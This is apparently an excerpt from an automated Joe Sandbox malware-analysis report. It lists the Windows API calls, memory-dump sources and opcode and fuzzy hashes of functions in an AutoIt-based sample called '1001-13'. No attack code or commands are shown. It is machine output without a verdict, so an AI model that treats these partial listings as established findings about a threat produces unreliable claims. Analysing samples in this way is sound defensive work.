                                                      • API String ID: 176396367-0
                                                      • Opcode ID: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                                      • Instruction ID: 0b0519af1c57620da85c1da83ed2694483b64661c64c5b5618884107f3f1e3d3
                                                      • Opcode Fuzzy Hash: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                                      • Instruction Fuzzy Hash: 81F0C8B36006016ED7159F28D807BA7BBD4EF44760F50852AFA19DB1D1DB71E514C7A0
                                                      Function 00E64C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,00E31129,00000000,?,00E62E29,00000001,00000364,?,?,?,00E5F2DE,00E63863,00F01444,?,00E4FDF5,?), ref: 00E64CBE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: ce673951a691e7f193b3f6acc1b3692a16c5e652ac2e05a4a40d4678a148615a
                                                      • Instruction ID: 2ca98a6b115300911138d5eca740ac1ee28ea2eff5d1d29f49f17d69d82ad73e
                                                      • Opcode Fuzzy Hash: ce673951a691e7f193b3f6acc1b3692a16c5e652ac2e05a4a40d4678a148615a
                                                      • Instruction Fuzzy Hash: 90F0BBB168212466FB215F66BC05F56B7C8BF817E5B186111FC15B63D0CA30D80156E0
                                                      Function 00E63820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: d0fe4dd26b03e0c28b22c73e6f558402a4627ba50540cf400afaaca826ed33fc
                                                      • Instruction ID: 99abefcf7840c056d7f264c555b3756a126d9ad912f536247f31a5153dd38dce
                                                      • Opcode Fuzzy Hash: d0fe4dd26b03e0c28b22c73e6f558402a4627ba50540cf400afaaca826ed33fc
                                                      • Instruction Fuzzy Hash: 46E0E5311812245AE6292677BC05BDA36C9AB427F9F193220FC05B74D2CB11DD0282E0
                                                      Function 00E34F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34F6D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 1f35e08d95be230739613567cf081909c49611afff5c07cabf07db9a70969e95
                                                      • Instruction ID: 8e524cb45dbae1bb8c8a89f8d6535b4307c46f43e5b0349043f8a07ff99ef368
                                                      • Opcode Fuzzy Hash: 1f35e08d95be230739613567cf081909c49611afff5c07cabf07db9a70969e95
                                                      • Instruction Fuzzy Hash: C1F0A0B0205701CFCB348F21D498812BBF0FF00319728A9BEE1DAA2650C731A848DF00
                                                      Function 00E9CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00E7EE51,00EF3630,00000002), ref: 00E9CD26
                                                        • Part of subcall function 00E9CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00E9CD19,?,?,?), ref: 00E9CC59
                                                        • Part of subcall function 00E9CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00E9CD19,?,?,?,?,00E7EE51,00EF3630,00000002), ref: 00E9CC6E
                                                        • Part of subcall function 00E9CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00E9CD19,?,?,?,?,00E7EE51,00EF3630,00000002), ref: 00E9CC7A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$Write
                                                      • String ID:
                                                      • API String ID: 3847668363-0
                                                      • Opcode ID: 93fdb94b48f6e9a74c0ec14e234a0e23339c89afd725fb88be555621a8c05713
                                                      • Instruction ID: 83e0324ec2aa60e16d6849b51bea5c9f23d3d95b42f7c51cc7fd6fb4424818b7
                                                      • Opcode Fuzzy Hash: 93fdb94b48f6e9a74c0ec14e234a0e23339c89afd725fb88be555621a8c05713
                                                      • Instruction Fuzzy Hash: 7AE03076400604EFCB219F46D90089ABBF8FF84250720852FE95592510D371AA15DB60
                                                      Function 00E32DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E32DC4
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_wcslen
                                                      • String ID:
                                                      • API String ID: 541455249-0
                                                      • Opcode ID: fcb319d1d073d975e7e6d5a645f6391e6bb59905bcac2a4643139d893afdfc0a
                                                      • Instruction ID: f08674dff77a0b609edc44c1210419cbf66389ef109c1b314176de299c6ea41f
                                                      • Opcode Fuzzy Hash: fcb319d1d073d975e7e6d5a645f6391e6bb59905bcac2a4643139d893afdfc0a
                                                      • Instruction Fuzzy Hash: 10E0CD72A002245BC71092589C09FDA77EDDFC8790F0440B1FD0DF7258D960AD84C650
                                                      Function 00E32B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E33837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E33908
                                                        • Part of subcall function 00E3D730: GetInputState.USER32 ref: 00E3D807
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E32B6B
                                                        • Part of subcall function 00E330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E3314E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                      • String ID:
                                                      • API String ID: 3667716007-0
                                                      • Opcode ID: a985dcfdfd3f62590f97c13252c25ff308089538755a45a6ffc0668594fa99db
                                                      • Instruction ID: 436cf4c8a28993bd19577fdf0545320a9693bd22f3a22e77e17a83c2428793c8
                                                      • Opcode Fuzzy Hash: a985dcfdfd3f62590f97c13252c25ff308089538755a45a6ffc0668594fa99db
                                                      • Instruction Fuzzy Hash: D9E0262530424406C608BB34A81A87DFFD9ABD2311F40343EF142A31A3CF244549C211
                                                      Function 00E7039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00E70704,?,?,00000000,?,00E70704,00000000,0000000C), ref: 00E703B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 7b316b5e6c4bbb450312487ba8ea5369983ab508649c3278cfa5d14ec17317a5
                                                      • Instruction ID: 852ceba70778a00176d13a258da35ec0015d3ff2c773d1c2e27d139d8d0fac15
                                                      • Opcode Fuzzy Hash: 7b316b5e6c4bbb450312487ba8ea5369983ab508649c3278cfa5d14ec17317a5
                                                      • Instruction Fuzzy Hash: 55D06C3204010DBFDF028F86DD06EDA3BAAFB48714F114010FE5866020C732E822AB90
                                                      Function 00E31CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00E31CBC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem
                                                      • String ID:
                                                      • API String ID: 3098949447-0
                                                      • Opcode ID: 352f9ea3a8117fe84ba00f6ade44a34e98e0a064819751fdd714ec02b7cde021
                                                      • Instruction ID: f80e52c7758901027598ad82594221b43c5ee1b7ffcdeec559c2d75e598c4bef
                                                      • Opcode Fuzzy Hash: 352f9ea3a8117fe84ba00f6ade44a34e98e0a064819751fdd714ec02b7cde021
                                                      • Instruction Fuzzy Hash: 56C09236280308AFF7148B80BC4EF207764B34CB00F188001FA0DA95E3C3A22822FA64
                                                      Function 00EA744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E35745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E3949C,?,00008000), ref: 00E35773
                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00EA76DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorFileLast
                                                      • String ID:
                                                      • API String ID: 1214770103-0
                                                      • Opcode ID: 3d11926f20167387e5de091605b223f1f4b34e935e0ed646ac65485a1127a7e4
                                                      • Instruction ID: 19e9c75b470a9861697cc11d1b43e6afc85a3b46b1dd8b037f14e146982c3750
                                                      • Opcode Fuzzy Hash: 3d11926f20167387e5de091605b223f1f4b34e935e0ed646ac65485a1127a7e4
                                                      • Instruction Fuzzy Hash: BB8183306087019FCB14EF24C895B69B7E1AF89314F04656DF8867B3A2DB70ED45CB92
                                                      Function 01488FBC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 01488FD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                      • Instruction ID: 42875146e055ec103a15ed7dfdb124869f333910cf45e7e631a29a3d1ae7b9a8
                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                      • Instruction Fuzzy Hash: 4AE0BF7494410EEFDB00EFA4D6496EE7BB4EF04301F1005A1FE05D7691DB309E548A62
                                                      Function 00E36246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CloseHandle.KERNELBASE(?,?,00000000,00E724E0), ref: 00E36266
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 4bf4844077ab08db93a76f1f8ee395cc9f727806282043d43b31e1d258b77482
                                                      • Instruction ID: c3fb20c42c7b4c0df51e76ec62fe7044e7db155804254c525959f496cb98728e
                                                      • Opcode Fuzzy Hash: 4bf4844077ab08db93a76f1f8ee395cc9f727806282043d43b31e1d258b77482
                                                      • Instruction Fuzzy Hash: EFE09275400B01DEC3314F2AE808452FBF5FFE13653218A2ED1E5A2660E3B0588ACB50
                                                      Function 01488FC0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 01488FD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: 9cd7c1c5b2bb9391b62750a57ff7b863502e0f3350e21f4ef89b5be849bf5ef6
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: F7E0E67494410EDFDB00EFB4D6496AE7FB4EF04301F100161FD01D2281D7309D508A62

                                                      Non-executed Functions

                                                      Function 00EC9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EC961A
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EC965B
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EC969F
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EC96C9
                                                      • SendMessageW.USER32 ref: 00EC96F2
                                                      • GetKeyState.USER32(00000011), ref: 00EC978B
                                                      • GetKeyState.USER32(00000009), ref: 00EC9798
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EC97AE
                                                      • GetKeyState.USER32(00000010), ref: 00EC97B8
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EC97E9
                                                      • SendMessageW.USER32 ref: 00EC9810
                                                      • SendMessageW.USER32(?,00001030,?,00EC7E95), ref: 00EC9918
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EC992E
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EC9941
                                                      • SetCapture.USER32(?), ref: 00EC994A
                                                      • ClientToScreen.USER32(?,?), ref: 00EC99AF
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EC99BC
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EC99D6
                                                      • ReleaseCapture.USER32 ref: 00EC99E1
                                                      • GetCursorPos.USER32(?), ref: 00EC9A19
                                                      • ScreenToClient.USER32(?,?), ref: 00EC9A26
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EC9A80
                                                      • SendMessageW.USER32 ref: 00EC9AAE
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EC9AEB
                                                      • SendMessageW.USER32 ref: 00EC9B1A
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EC9B3B
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EC9B4A
                                                      • GetCursorPos.USER32(?), ref: 00EC9B68
                                                      • ScreenToClient.USER32(?,?), ref: 00EC9B75
                                                      • GetParent.USER32(?), ref: 00EC9B93
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EC9BFA
                                                      • SendMessageW.USER32 ref: 00EC9C2B
                                                      • ClientToScreen.USER32(?,?), ref: 00EC9C84
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EC9CB4
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EC9CDE
                                                      • SendMessageW.USER32 ref: 00EC9D01
                                                      • ClientToScreen.USER32(?,?), ref: 00EC9D4E
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EC9D82
                                                        • Part of subcall function 00E49944: GetWindowLongW.USER32(?,000000EB), ref: 00E49952
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC9E05
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3429851547-4164748364
                                                      • Opcode ID: cf30ac916128367f85115bbb31aa349e54db1791b2c834623d0726f574c0d808
                                                      • Instruction ID: f5651bdf4cd7692cd303dec93a8983d0d574c9e455307edfc4fbe2879f5abea1
                                                      • Opcode Fuzzy Hash: cf30ac916128367f85115bbb31aa349e54db1791b2c834623d0726f574c0d808
                                                      • Instruction Fuzzy Hash: 3C428B34204200AFD724CF24CE48FAABBE5FF48714F14161DF699A72A2D732E956DB52
                                                      Function 00EC4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00EC48F3
                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00EC4908
                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00EC4927
                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00EC494B
                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00EC495C
                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00EC497B
                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00EC49AE
                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00EC49D4
                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00EC4A0F
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00EC4A56
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00EC4A7E
                                                      • IsMenu.USER32(?), ref: 00EC4A97
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EC4AF2
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EC4B20
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC4B94
                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00EC4BE3
                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00EC4C82
                                                      • wsprintfW.USER32 ref: 00EC4CAE
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EC4CC9
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00EC4CF1
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EC4D13
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EC4D33
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00EC4D5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 4054740463-328681919
                                                      • Opcode ID: 12a8190a7e537c554664b8c85660e715974682e9efbe2d1951fc742fc6a1070d
                                                      • Instruction ID: 12811925069181bb2702f7afeb97af6f93e7ea0c7fb17bb481e9bb2de7583eca
                                                      • Opcode Fuzzy Hash: 12a8190a7e537c554664b8c85660e715974682e9efbe2d1951fc742fc6a1070d
                                                      • Instruction Fuzzy Hash: 151211B1600254AFEB248F24CE59FAE7BF8AF44714F10612DF41AFA2E0D7769942CB50
                                                      Function 00E4F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00E4F998
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E8F474
                                                      • IsIconic.USER32(00000000), ref: 00E8F47D
                                                      • ShowWindow.USER32(00000000,00000009), ref: 00E8F48A
                                                      • SetForegroundWindow.USER32(00000000), ref: 00E8F494
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E8F4AA
                                                      • GetCurrentThreadId.KERNEL32 ref: 00E8F4B1
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E8F4BD
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E8F4CE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E8F4D6
                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00E8F4DE
                                                      • SetForegroundWindow.USER32(00000000), ref: 00E8F4E1
